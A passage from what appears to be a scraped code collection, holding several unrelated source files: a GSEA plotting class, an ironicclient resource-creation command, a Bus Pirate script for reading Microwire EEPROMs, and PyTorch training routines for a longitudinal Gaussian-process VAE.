ixpk = np.where(es_all == np.min(es_all))[0][0]
isen[ixpk:] = 1
ledge = self.__rk[(isen == 1) & (hits == 1)]
ledge = ledge[::-1]
else:
ixpk = np.where(es_all == np.max(es_all))[0][0]
print(ixpk)
isen[0:(ixpk + 1)] = 1
ledge = self.__rk[(isen == 1) & (hits == 1)]
return es, es_all, hits, ledge
def ext_gsea(self, gs1, gs2, name1='Gene set 1', name2='Gene set 2'):
self.__gs1 = gs1
self.__gs2 = gs2
self.__gsn1 = name1
self.__gsn2 = name2
l = len(self.__rk)
self.__hits1 = np.zeros(l)
self.__hits2 = np.zeros(l)
for i in range(0, l):
if self.__rk[i] in gs1:
self.__hits1[i] = 1
if self.__rk[i] in gs2:
self.__hits2[i] = 1
l = len(self.__rkc)
self.__isgs = np.zeros(l)
for i in range(0, l):
if (self.__pn[i] > 0 and self.__rkc[i] in gs1) or (self.__pn[i] < 0 and self.__rkc[i] in gs2):
self.__isgs[i] = 1
# Compute ES
if self.__w != 1:
self.__score_hit = np.cumsum(np.abs(self.__rsc * self.__isgs) ** self.__w)
else:
self.__score_hit = np.cumsum(np.abs(self.__rsc * self.__isgs))
self.__score_hit = self.__score_hit / self.__score_hit[-1]
self.__score_miss = np.cumsum(1 - self.__isgs)
self.__score_miss = self.__score_miss / self.__score_miss[-1]
self.__es_all = self.__score_hit - self.__score_miss
self.__es = np.max(self.__es_all) + np.min(self.__es_all)
isen = np.zeros(l)
if self.__es < 0:
ixpk = np.where(self.__es_all == np.min(self.__es_all))[0][0]
isen[ixpk:] = 1
self.__ledge = self.__rkc[(isen == 1) & (self.__isgs == 1)]
self.__ledge = self.__ledge[::-1]
else:
ixpk = np.where(self.__es_all == np.max(self.__es_all))[0][0]
isen[0:(ixpk + 1)] = 1
self.__ledge = self.__rkc[(isen == 1) & (self.__isgs == 1)]
if self.__np > 0:
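            # Permutation null: the set-membership indicator is shuffled
            # self.__np times and the ES statistic recomputed each time; the
            # p-value is the fraction of permuted ES values at least as extreme
            # as the observed one, and NES normalises ES by the mean magnitude
            # of the same-signed permuted values.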
self.__bg['es'] = np.zeros(self.__np)
for i in range(0, self.__np):
                self.__bg['isgs'] = self.__isgs[np.random.permutation(l)]
if self.__w != 1:
self.__bg['hit'] = np.cumsum((np.abs(self.__rsc * self.__bg['isgs'])) ** self.__w)
else:
self.__bg['hit'] = np.cumsum(np.abs(self.__rsc * self.__bg['isgs']))
self.__bg['hit'] = self.__bg['hit'] / self.__bg['hit'][-1]
                self.__bg['miss'] = np.cumsum(1 - self.__bg['isgs'])
                self.__bg['miss'] = self.__bg['miss'] / self.__bg['miss'][-1]
                self.__bg['all'] = self.__bg['hit'] - self.__bg['miss']
                self.__bg['es'][i] = max(self.__bg['all']) + min(self.__bg['all'])
if self.__es < 0:
self.__pv = np.sum(self.__bg['es'] <= self.__es) / self.__np
self.__nes = self.__es / np.abs(np.mean(self.__bg['es'][self.__bg['es'] < 0]))
else:
self.__pv = np.sum(self.__bg['es'] >= self.__es) / self.__np
self.__nes = self.__es / np.abs(np.mean(self.__bg['es'][self.__bg['es'] > 0]))
else:
self.__pv = -1
self.__nes = -1
self.__run = True
return self.__es, self.__nes, self.__pv, self.__ledge
@property
def bg(self):
return self.__bg
@property
def score_hit(self):
return self.__score_hit
@property
def isgs(self):
return self.__isgs
@property
def es(self):
return self.__es
@property
def es_all(self):
return self.__es_all
@property
def score_miss(self):
return self.__score_miss
def plot(self, title=None, out=None):
"""
Replot existing GSEA plot to make it better for publications
"""
if not self.__run:
return
libplot.setup()
# output truetype
#plt.rcParams.update({'pdf.fonttype':42,'ps.fonttype':42})
        # In most cases we will have many plots, so do not display them
        # interactively; this also makes it convenient to run this script from the command line.
fig = libplot.new_base_fig(w=10, h=7)
# GSEA Plots
gs = gridspec.GridSpec(16, 1)
x = np.array(list(range(0, len(self.__rk))))
es1, es_all1, hits1, ledge1 = self.enrichment_score(self.__gs1)
es2, es_all2, hits2, ledge2 = self.enrichment_score(self.__gs2)
# Ranked Metric Scores Plot
ix = list(range(0, len(x), 100))
print(ix)
x1 = x[ix]
y1 = self.__rs[ix]
print(hits1)
ax1 = fig.add_subplot(gs[10:])
ax1.fill_between(x1, y1=y1, y2=0, color='#2c5aa0')
ax1.set_ylabel("Ranked list metric", fontsize=14)
ax1.text(.05, .9, self.__gsn1, color='black', horizontalalignment='left', verticalalignment='top',
transform=ax1.transAxes)
ax1.text(.95, .05, self.__gsn2, color='red', horizontalalignment='right', verticalalignment='bottom',
transform=ax1.transAxes)
ax1.spines['top'].set_visible(False)
ax1.spines['right'].set_visible(False)
ax1.set_xlim((0, len(x)))
#
# Hits
#
# gene hits
ax2 = fig.add_subplot(gs[8:9], sharex=ax1)
# the x coords of this transformation are data, and the y coord are axes
trans2 = transforms.blended_transform_factory(ax2.transData, ax2.transAxes)
ax2.vlines(np.where(hits1 == 1)[0], 0, 1, linewidth=.5, transform=trans2, color ='black')
libplot.invisible_axes(ax2)
ax3 = fig.add_subplot(gs[9:10], sharex=ax1)
# the x coords of this transformation are data, and the y coord are axes
trans3 = transforms.blended_transform_factory(ax3.transData, ax3.transAxes)
ax3.vlines(np.where(hits2 == 1)[0], 0, 1, linewidth=.5,transform=trans3, color ='red')
libplot.invisible_axes(ax3)
#
# Enrichment score plot
#
ax4 = fig.add_subplot(gs[:8], sharex=ax1)
# max es
y2 = np.max(es_all1)
x1 = np.where(es_all1 == y2)[0]
print(x1, y2)
ax4.vlines(x1, 0, y2, linewidth=.5, color='grey')
y2 = np.min(es_all2)
x1 = np.where(es_all2 == y2)[0]
print(x1, y2)
ax4.vlines(x1, 0, y2, linewidth=.5, color='grey')
y1 = es_all1
y2 = es_all2
ax4.plot(x, y1, linewidth=3, color ='black')
ax4.plot(x, y2, linewidth=3, color ='red')
ax4.tick_params(axis='both', which='both', color='dimgray')
#ax4.spines['left'].set_color('dimgray')
ax4.spines['bottom'].set_visible(False) #set_color('dimgray')
# the y coords of this transformation are data, and the x coord are axes
trans4 = transforms.blended_transform_factory(ax4.transAxes, ax4.transData)
ax4.hlines(0, 0, 1, linewidth=.5, transform=trans4, color='grey')
ax4.set_ylabel("Enrichment score (ES)", fontsize=14)
ax4.set_xlim(min(x), max(x))
ax4.spines['top'].set_visible(False)
ax4.spines['right'].set_visible(False)
ax4.tick_params(axis='both', which='both', bottom='off', top='off', labelbottom='off', right='off')
ax4.locator_params(axis='y', nbins=5)
        # FuncFormatter expects a (tick_loc, tick_num) pair; this lambda formats the y-axis tick labels to one decimal place.
ax4.yaxis.set_major_formatter(plt.FuncFormatter(lambda tick_loc,tick_num : '{:.1f}'.format(tick_loc)) )
if title is not None:
fig.suptitle(title)
fig.tight_layout(pad=2) #rect=[o, o, w, w])
if out is not None:
plt.savefig(out, dpi=600)
| 2.65625
| 3
|
ironicclient/v1/create_resources_shell.py
|
sapcc/python-ironicclient
| 0
|
12775644
|
<reponame>sapcc/python-ironicclient
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ironicclient.common import cliutils
from ironicclient.v1 import create_resources
@cliutils.arg('resource_files', nargs='+', metavar='<file>', default=[],
help='File (.yaml or .json) containing descriptions of the '
'resources to create. Can be specified multiple times.')
def do_create(cc, args):
"""Create baremetal resources (chassis, nodes, port groups and ports).
The resources may be described in one or more JSON or YAML files. If any
file cannot be validated, no resources are created. An attempt is made to
create all the resources; those that could not be created are skipped
(with a corresponding error message).
"""
create_resources.create_resources(cc, args.resource_files)
| 2.53125
| 3
|
scripts/pyBusPirateLite/MicroWire.py
|
bopopescu/Bus-Pirate-1
| 0
|
12775645
|
#!/usr/bin/env python
# encoding: utf-8
import sys,time
from optparse import OptionParser
from pyBusPirateLite.RAW_WIRE import *
def main():
# First of all parse the command line
parser = OptionParser()
parser.add_option("-c", "--capacity", dest="capacity", help="size of the memory chip.", type="int")
parser.add_option("-o", "--org", dest="org", help="specify the memory organization mode (8 or 16).", type="int")
parser.add_option("-a", "--addr", dest="addr", help="set the starting offset of the read or write procedure.", type="int", default=0)
parser.add_option("-n", "--number", dest="n", help="the number of data elements to read or write.", type="int", default=0)
parser.add_option("-f", "--file", dest="file", help="the input or output file.", metavar="FILE")
parser.add_option("-r", "--read", dest="action", help="read the memory chip.", default="read")
parser.add_option("-w", "--write", dest="action", help="write to the memory chip.")
parser.add_option("-d", "--device", dest="device", help="serial interface where bus pirate is in.[/dev/bus_pirate]", default="/dev/bus_pirate")
parser.add_option("-v", "--verbose", dest="verbose", help="don't be quiet.", action="store_true")
parser.add_option("-m", "--more", dest="more", help="only for testing: read more data elements", type="int", default=0)
(options,args) = parser.parse_args()
if (not options.capacity) or (not options.org) or (not options.file):
parser.print_help()
exit()
# Create an instance of the RAW_WIRE class as we are using the BitBang/RAW_WIRE mode
#rw = RAW_WIRE( '/dev/bus_pirate', 115200 )
rw = RAW_WIRE( options.device, 115200 )
if not rw.BBmode():
print "Can't enter into BitBang mode."
exit()
    # We have successfully activated the BitBang mode, so we continue with
# the raw-wire mode.
if not rw.enter_rawwire():
print "Can't enable the raw-wire mode."
exit()
# Now we have raw-wire mode enabled, so first configure peripherals
# (Power, PullUps, AUX, CS)
if not rw.raw_cfg_pins( PinCfg.POWER | PinCfg.CS ):
print "Error enabling the internal voltage regulators."
# Configure the raw-wire mode
if not rw.cfg_raw_wire( (RAW_WIRECfg.BIT_ORDER & RAW_WIRE_BIT_ORDER_TYPE.MSB) | (RAW_WIRECfg.WIRES & RAW_WIRE_WIRES_TYPE.THREE) | (RAW_WIRECfg.OUT_TYPE & RAW_WIRE_OUT_TYPE._3V3) ):
print "Error configuring the raw-wire mode."
# Set raw-wire speed
if not rw.set_speed( RAW_WIRESpeed._5KHZ ):
print "Error setting raw-wire speed."
    # Open the file for reading or writing
if options.action == "read":
f = file(options.file, "wb")
else:
f = file(options.file, "rb")
# How many elements to read or write?
if options.n != 0:
N = options.n + options.more
else:
N = options.capacity / options.org + options.more
    # Opcodes for microwire memory devices
    #
    #               Start  Op      Address              Data
    # Instruction   bit    code    x8         x16       x8    x16    Comments
    # READ          1      10      A8 – A0    A7 – A0                Reads data stored in memory, at specified address
    # EWEN          1      00      11XXXXXXX  11XXXXXX               Write enable must precede all programming modes
    #
    # ....
    #
if options.action == "read":
# Enable the Chip select signal
rw.CS_High()
rw.bulk_trans(1, [0x6])
rw.bulk_trans(1, [0x0])
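        # The two bulk transfers above are assumed to clock out the start bit
        # plus READ opcode (0b110 == 0x6) followed by a zero address byte, per
        # the opcode table above; adjust if your device expects a different
        # address width.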
# and read the items
if options.verbose:
print "Reading %d elements of %d bits" % (N, options.org)
if options.org == 8:
for i in range(0,N):
byte = rw.read_byte()
f.write(byte)
if options.verbose:
print "%02X" % (ord(byte),) ,
else:
for i in range(0,N):
byte = rw.read_byte()
f.write(byte)
if options.verbose:
print "%02X" % (ord(byte),) ,
byte = rw.read_byte()
f.write(byte)
if options.verbose:
print "%02X" % (ord(byte),) ,
f.close()
rw.CS_Low()
print "Done."
# Reset the bus pirate
rw.resetBP();
if __name__ == '__main__':
main()
| 2.8125
| 3
|
training.py
|
SidRama/Longitudinal-VAE
| 4
|
12775646
|
from torchvision import transforms
from torch.utils.data import DataLoader
from torch.utils.data.sampler import BatchSampler
import numpy as np
import torch
import os
from elbo_functions import deviance_upper_bound, elbo, KL_closed, minibatch_KLD_upper_bound, minibatch_KLD_upper_bound_iter
from model_test import MSE_test_GPapprox, MSE_test
from utils import SubjectSampler, VaryingLengthSubjectSampler, VaryingLengthBatchSampler, HensmanDataLoader
from predict_HealthMNIST import recon_complete_gen, gen_rotated_mnist_plot, variational_complete_gen
from validation import validate
def hensman_training(nnet_model, type_nnet, epochs, dataset, optimiser, type_KL, num_samples, latent_dim, covar_module0,
covar_module1, likelihoods, m, H, zt_list, P, T, varying_T, Q, weight, id_covariate, loss_function,
natural_gradient=False, natural_gradient_lr=0.01, subjects_per_batch=20, memory_dbg=False,
eps=1e-6, results_path=None, validation_dataset=None, generation_dataset=None,
prediction_dataset=None, gp_model=None, csv_file_test_data=None, csv_file_test_label=None,
test_mask_file=None, data_source_path=None):
"""
    Perform training with minibatching and Stochastic Variational Inference [Hensman et al., 2013]. See the L-VAE supplementary
    materials.
:param nnet_model: encoder/decoder neural network model
:param type_nnet: type of encoder/decoder
    :param epochs: number of epochs
:param dataset: dataset to use in training
:param optimiser: optimiser to be used
    :param type_KL: type of KL divergence computation to use
:param num_samples: number of samples to use
:param latent_dim: number of latent dimensions
:param covar_module0: additive kernel (sum of cross-covariances) without id covariate
:param covar_module1: additive kernel (sum of cross-covariances) with id covariate
:param likelihoods: GPyTorch likelihood model
:param m: variational mean
:param H: variational variance
:param zt_list: list of inducing points
:param P: number of unique instances
:param T: number of longitudinal samples per individual
:param Q: number of covariates
:param weight: value for the weight
:param id_covariate: covariate number of the id
:param loss_function: selected loss function
:param natural_gradient: use of natural gradients
:param natural_gradient_lr: natural gradients learning rate
    :param subjects_per_batch: number of subjects per batch (vectorisation)
:param memory_dbg: enable debugging
:param eps: jitter
:param results_path: path to results
    :param validation_dataset: dataset for the validation set
    :param generation_dataset: dataset to help with sample image generation
    :param prediction_dataset: dataset with subjects for prediction
    :param gp_model: GPyTorch GP model
:param csv_file_test_data: path to test data
:param csv_file_test_label: path to test label
:param test_mask_file: path to test mask
:param data_source_path: path to data source
:return trained models and resulting losses
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
N = len(dataset)
assert type_KL == 'GPapprox_closed'
if varying_T:
n_batches = (P + subjects_per_batch - 1)//subjects_per_batch
dataloader = HensmanDataLoader(dataset, batch_sampler=VaryingLengthBatchSampler(VaryingLengthSubjectSampler(dataset, id_covariate), subjects_per_batch), num_workers=4)
else:
batch_size = subjects_per_batch*T
n_batches = (P*T + batch_size - 1)//(batch_size)
dataloader = HensmanDataLoader(dataset, batch_sampler=BatchSampler(SubjectSampler(dataset, P, T), batch_size, drop_last=False), num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
kld_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
best_val_pred_mse = np.Inf
best_epoch = 0
for epoch in range(1, epochs + 1):
recon_loss_sum = 0
nll_loss_sum = 0
kld_loss_sum = 0
net_loss_sum = 0
iid_kld_sum = 0
for batch_idx, sample_batched in enumerate(dataloader):
optimiser.zero_grad()
nnet_model.train()
covar_module0.train()
covar_module1.train()
indices = sample_batched['idx']
data = sample_batched['digit'].double().to(device)
train_x = sample_batched['label'].double().to(device)
mask = sample_batched['mask'].double().to(device)
N_batch = data.shape[0]
covariates = torch.cat((train_x[:, :id_covariate], train_x[:, id_covariate+1:]), dim=1)
recon_batch, mu, log_var = nnet_model(data)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll_loss = torch.sum(nll)
PSD_H = H if natural_gradient else torch.matmul(H, H.transpose(-1, -2))
if varying_T:
P_in_current_batch = torch.unique(train_x[:, id_covariate]).shape[0]
kld_loss, grad_m, grad_H = minibatch_KLD_upper_bound_iter(covar_module0, covar_module1, likelihoods, latent_dim, m, PSD_H, train_x, mu, log_var, zt_list, P, P_in_current_batch, N, natural_gradient, id_covariate, eps)
else:
P_in_current_batch = N_batch // T
kld_loss, grad_m, grad_H = minibatch_KLD_upper_bound(covar_module0, covar_module1, likelihoods, latent_dim, m, PSD_H, train_x, mu, log_var, zt_list, P, P_in_current_batch, T, natural_gradient, eps)
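            # Rescale the minibatch reconstruction/NLL terms from
            # P_in_current_batch subjects up to all P subjects, so they remain
            # comparable with the KLD upper bound (which is presumably already
            # scaled to the full data via P and P_in_current_batch above).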
recon_loss = recon_loss * P/P_in_current_batch
nll_loss = nll_loss * P/P_in_current_batch
if loss_function == 'nll':
net_loss = nll_loss + kld_loss
elif loss_function == 'mse':
kld_loss = kld_loss / latent_dim
net_loss = recon_loss + weight * kld_loss
net_loss.backward()
optimiser.step()
if natural_gradient:
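                # Natural-gradient update sketch: work in the precision
                # parameterisation (iH = H^{-1}), take a step of size
                # natural_gradient_lr along the symmetrised gradient, then map
                # back to the covariance H and update the mean m accordingly.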
LH = torch.cholesky(H)
iH = torch.cholesky_solve(torch.eye(H.shape[-1], dtype=torch.double).to(device), LH)
iH_new = iH + natural_gradient_lr*(grad_H + grad_H.transpose(-1,-2))
LiH_new = torch.cholesky(iH_new)
H = torch.cholesky_solve(torch.eye(H.shape[-1], dtype=torch.double).to(device), LiH_new).detach()
m = torch.matmul(H, torch.matmul(iH, m) - natural_gradient_lr*(grad_m - 2*torch.matmul(grad_H, m))).detach()
net_loss_sum += net_loss.item() / n_batches
recon_loss_sum += recon_loss.item() / n_batches
nll_loss_sum += nll_loss.item() / n_batches
kld_loss_sum += kld_loss.item() / n_batches
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL Loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, net_loss_sum, kld_loss_sum, nll_loss_sum, recon_loss_sum), flush=True)
penalty_term_arr = np.append(penalty_term_arr, 0.0)
net_train_loss_arr = np.append(net_train_loss_arr, net_loss_sum)
recon_loss_arr = np.append(recon_loss_arr, recon_loss_sum)
nll_loss_arr = np.append(nll_loss_arr, nll_loss_sum)
kld_loss_arr = np.append(kld_loss_arr, kld_loss_sum)
if (not epoch % 25) and epoch != epochs:
with torch.no_grad():
nnet_model.eval()
covar_module0.eval()
covar_module1.eval()
if validation_dataset is not None:
full_mu = torch.zeros(len(dataset), latent_dim, dtype=torch.double).to(device)
prediction_x = torch.zeros(len(dataset), Q, dtype=torch.double).to(device)
for batch_idx, sample_batched in enumerate(dataloader):
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat((prediction_x[label_id, :id_covariate], prediction_x[label_id, id_covariate+1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
val_pred_mse = validate(nnet_model, type_nnet, validation_dataset, type_KL, num_samples, latent_dim, covar_module0, covar_module1, likelihoods, zt_list, T, weight, full_mu, prediction_x, id_covariate, loss_function, eps=1e-6)
if val_pred_mse < best_val_pred_mse:
best_val_pred_mse = val_pred_mse
best_epoch = epoch
prediction_dataloader = DataLoader(prediction_dataset, batch_sampler=VaryingLengthBatchSampler(
VaryingLengthSubjectSampler(prediction_dataset, id_covariate), subjects_per_batch),
num_workers=4)
full_mu = torch.zeros(len(prediction_dataset), latent_dim, dtype=torch.double).to(device)
prediction_x = torch.zeros(len(prediction_dataset), Q, dtype=torch.double).to(device)
with torch.no_grad():
for batch_idx, sample_batched in enumerate(prediction_dataloader):
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat(
(prediction_x[label_id, :id_covariate], prediction_x[label_id, id_covariate + 1:]),
dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
covar_module0.eval()
covar_module1.eval()
if type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
MSE_test_GPapprox(csv_file_test_data, csv_file_test_label, test_mask_file,
data_source_path, type_nnet,
nnet_model, covar_module0, covar_module1, likelihoods, results_path,
latent_dim, prediction_x,
full_mu, zt_list, P, T, id_covariate, varying_T,
save_file='result_error_best.csv')
print('Saving better model')
try:
torch.save(nnet_model.state_dict(), os.path.join(results_path, 'nnet_model_best.pth'))
torch.save(gp_model.state_dict(), os.path.join(results_path, 'gp_model_best.pth'))
torch.save(zt_list, os.path.join(results_path, 'zt_list_best.pth'))
torch.save(m, os.path.join(results_path, 'm_best.pth'))
torch.save(H, os.path.join(results_path, 'H_best.pth'))
if results_path and generation_dataset:
prediction_dataloader = DataLoader(prediction_dataset,
batch_sampler=VaryingLengthBatchSampler(
VaryingLengthSubjectSampler(prediction_dataset,
id_covariate),
subjects_per_batch), num_workers=4)
full_mu = torch.zeros(len(prediction_dataset), latent_dim, dtype=torch.double).to(
device)
prediction_x = torch.zeros(len(prediction_dataset), Q, dtype=torch.double).to(device)
for batch_idx, sample_batched in enumerate(prediction_dataloader):
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat((prediction_x[label_id, :id_covariate],
prediction_x[label_id, id_covariate + 1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
recon_complete_gen(generation_dataset, nnet_model, type_nnet,
results_path, covar_module0,
covar_module1, likelihoods, latent_dim,
'./data', prediction_x, full_mu, epoch,
zt_list, P, T, id_covariate, varying_T)
                        except Exception as e:
print(e)
print('Saving intermediate model failed!')
pass
if torch.cuda.is_available():
torch.cuda.empty_cache()
return penalty_term_arr, net_train_loss_arr, nll_loss_arr, recon_loss_arr, kld_loss_arr, m, H, best_epoch
def minibatch_training(nnet_model, type_nnet, epochs, dataset, optimiser, type_KL, num_samples, latent_dim,
covar_module0, covar_module1, likelihoods, zt_list, P, T, Q, weight, id_covariate,
loss_function, memory_dbg=False, eps=1e-6, results_path=None, validation_dataset=None,
generation_dataset=None, prediction_dataset=None):
"""
    Perform training with minibatching (pseudo-minibatching) similar to GPPVAE [Casale et al., 2018]. See the L-VAE supplementary
    materials.
:param nnet_model: encoder/decoder neural network model
:param type_nnet: type of encoder/decoder
    :param epochs: number of epochs
:param dataset: dataset to use in training
:param optimiser: optimiser to be used
    :param type_KL: type of KL divergence computation to use
:param num_samples: number of samples to use
:param latent_dim: number of latent dimensions
:param covar_module0: additive kernel (sum of cross-covariances) without id covariate
:param covar_module1: additive kernel (sum of cross-covariances) with id covariate
:param likelihoods: GPyTorch likelihood model
:param zt_list: list of inducing points
:param P: number of unique instances
:param T: number of longitudinal samples per individual
:param Q: number of covariates
:param weight: value for the weight
:param id_covariate: covariate number of the id
:param loss_function: selected loss function
:param memory_dbg: enable debugging
:param eps: jitter
:param results_path: path to results
    :param validation_dataset: dataset for the validation set
    :param generation_dataset: dataset to help with sample image generation
    :param prediction_dataset: dataset with subjects for prediction
:return trained models and resulting losses
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = T
assert (type_KL == 'GPapprox_closed' or type_KL == 'GPapprox')
# set up Data Loader for training
dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
gp_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
for epoch in range(1, epochs + 1):
optimiser.zero_grad()
full_mu = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
full_log_var = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
train_x = torch.zeros(len(dataset), Q, dtype=torch.double, requires_grad=False).to(device)
#Step 1: Encode the sample data to obtain \bar{\mu} and diag(W)
with torch.no_grad():
for batch_idx, sample_batched in enumerate(dataloader):
indices = sample_batched['idx']
data = sample_batched['digit'].double().to(device)
train_x[indices] = sample_batched['label'].double().to(device)
covariates = torch.cat((train_x[indices, :id_covariate], train_x[indices, id_covariate+1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[indices] = mu
full_log_var[indices] = log_var
mu_grads = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
log_var_grads = torch.zeros(len(dataset), latent_dim, dtype=torch.double, requires_grad=True).to(device)
gp_losses = 0
gp_loss_sum = 0
param_list = []
#Steps 2 & 3: compute d and E, compute gradients of KLD w.r.t S and theta
if type_KL == 'GPapprox':
for sample in range(0, num_samples):
Z = nnet_model.sample_latent(full_mu, full_log_var)
for i in range(0, latent_dim):
Z_dim = Z[:, i]
gp_loss = -elbo(covar_module0[i], covar_module1[i], likelihoods[i], train_x, Z_dim,
zt_list[i].to(device), P, T, eps)
gp_loss_sum = gp_loss.item() + gp_loss_sum
gp_losses = gp_losses + gp_loss
gp_losses = gp_losses / num_samples
gp_loss_sum /= num_samples
elif type_KL == 'GPapprox_closed':
for i in range(0, latent_dim):
mu_sliced = full_mu[:, i]
log_var_sliced = full_log_var[:, i]
gp_loss = deviance_upper_bound(covar_module0[i], covar_module1[i],
likelihoods[i], train_x,
mu_sliced, log_var_sliced,
zt_list[i].to(device), P,
T, eps)
gp_loss_sum = gp_loss.item() + gp_loss_sum
gp_losses = gp_losses + gp_loss
for i in range(0, latent_dim):
param_list += list(covar_module0[i].parameters())
param_list += list(covar_module1[i].parameters())
# param_list.append(zt_list[i])
if loss_function == 'mse':
gp_losses = weight*gp_losses/latent_dim
gp_loss_sum /= latent_dim
mu_grads = torch.autograd.grad(gp_losses, full_mu, retain_graph=True)[0]
log_var_grads = torch.autograd.grad(gp_losses, full_log_var, retain_graph=True)[0]
grads = torch.autograd.grad(gp_losses, param_list)
for ind, p in enumerate(param_list):
p.grad = grads[ind]
recon_loss_sum = 0
nll_loss_sum = 0
#Step 4: compute reconstruction losses w.r.t phi and psi, add dKLD/dphi to the gradients
for batch_idx, sample_batched in enumerate(dataloader):
data = sample_batched['digit'].double().to(device)
mask = sample_batched['mask'].double().to(device)
indices = sample_batched['idx']
label = sample_batched['label'].double().to(device)
covariates = torch.cat((label[:, :id_covariate], label[:, id_covariate+1:]), dim=1)
recon_batch, mu, log_var = nnet_model(data)
[recon_loss, nll] = nnet_model.loss_function(recon_batch, data, mask)
recon_loss = torch.sum(recon_loss)
nll = torch.sum(nll)
mu.backward(mu_grads[indices], retain_graph = True)
log_var.backward(log_var_grads[indices], retain_graph = True)
if loss_function == 'mse':
recon_loss.backward()
elif loss_function == 'nll':
nll.backward()
recon_loss_sum = recon_loss_sum + recon_loss.item()
nll_loss_sum = nll_loss_sum + nll.item()
#Do logging
print('Iter %d/%d - Loss: %.3f - GP loss: %.3f - NLL loss: %.3f - Recon Loss: %.3f' % (
epoch, epochs, recon_loss_sum + weight*gp_loss_sum, gp_loss_sum, nll_loss_sum, recon_loss_sum))
penalty_term_arr = np.append(penalty_term_arr, 0.0)
net_train_loss_arr = np.append(net_train_loss_arr, recon_loss_sum + weight*gp_loss_sum)
nll_loss_arr = np.append(nll_loss_arr, nll_loss_sum)
recon_loss_arr = np.append(recon_loss_arr, recon_loss_sum)
gp_loss_arr = np.append(gp_loss_arr, gp_loss_sum)
#Step 5: apply gradients using an Adam optimiser
optimiser.step()
if (not epoch % 100) and epoch != epochs:
if validation_dataset is not None:
validate(nnet_model, type_nnet, validation_dataset, type_KL, num_samples, latent_dim, covar_module0, covar_module1, likelihoods, zt_list, T, weight, full_mu, train_x, id_covariate, loss_function, eps=1e-6)
if torch.cuda.is_available():
torch.cuda.empty_cache()
if results_path and generation_dataset:
prediction_dataloader = DataLoader(prediction_dataset, batch_size=1000, shuffle=False, num_workers=4)
full_mu = torch.zeros(len(prediction_dataset), latent_dim, dtype=torch.double).to(device)
prediction_x = torch.zeros(len(prediction_dataset), Q, dtype=torch.double).to(device)
with torch.no_grad():
for batch_idx, sample_batched in enumerate(prediction_dataloader):
# no mini-batching. Instead get a batch of dataset size
label_id = sample_batched['idx']
prediction_x[label_id] = sample_batched['label'].double().to(device)
data = sample_batched['digit'].double().to(device)
covariates = torch.cat((prediction_x[label_id, :id_covariate], prediction_x[label_id, id_covariate+1:]), dim=1)
mu, log_var = nnet_model.encode(data)
full_mu[label_id] = mu
recon_complete_gen(generation_dataset, nnet_model, type_nnet,
results_path, covar_module0,
covar_module1, likelihoods, latent_dim,
'./data', prediction_x, full_mu, epoch,
zt_list, P, T, id_covariate)
return penalty_term_arr, net_train_loss_arr, nll_loss_arr, recon_loss_arr, gp_loss_arr
def standard_training(nnet_model, type_nnet, epochs, dataset, optimiser, type_KL, num_samples,
latent_dim, covar_modules, likelihoods, zt_list, id_covariate, P, T, Q, weight, constrain_scales,
loss_function, memory_dbg=False, eps=1e-6, validation_dataset=None, generation_dataset=None, prediction_dataset=None):
"""
Perform training without minibatching.
:param nnet_model: encoder/decoder neural network model
:param type_nnet: type of encoder/decoder
    :param epochs: number of epochs
:param dataset: dataset to use in training
:param optimiser: optimiser to be used
    :param type_KL: type of KL divergence computation to use
:param num_samples: number of samples to use
:param latent_dim: number of latent dimensions
:param covar_modules: additive kernel (sum of cross-covariances)
:param likelihoods: GPyTorch likelihood model
:param zt_list: list of inducing points
:param id_covariate: covariate number of the id
:param P: number of unique instances
:param T: number of longitudinal samples per individual
:param Q: number of covariates
:param weight: value for the weight
:param constrain_scales: boolean to constrain scales to 1
:param loss_function: selected loss function
:param memory_dbg: enable debugging
:param eps: jitter
    :param validation_dataset: dataset for the validation set
    :param generation_dataset: dataset to help with sample image generation
    :param prediction_dataset: dataset with subjects for prediction
:return trained models and resulting losses
"""
if type_KL == 'closed':
covar_module = covar_modules[0]
elif type_KL == 'GPapprox' or type_KL == 'GPapprox_closed':
covar_module0 = covar_modules[0]
covar_module1 = covar_modules[1]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# set up Data Loader for training
dataloader = DataLoader(dataset, batch_size=len(dataset), shuffle=False, num_workers=4)
net_train_loss_arr = np.empty((0, 1))
recon_loss_arr = np.empty((0, 1))
nll_loss_arr = np.empty((0, 1))
gp_loss_arr = np.empty((0, 1))
penalty_term_arr = np.empty((0, 1))
for epoch in range(1, epochs + 1):
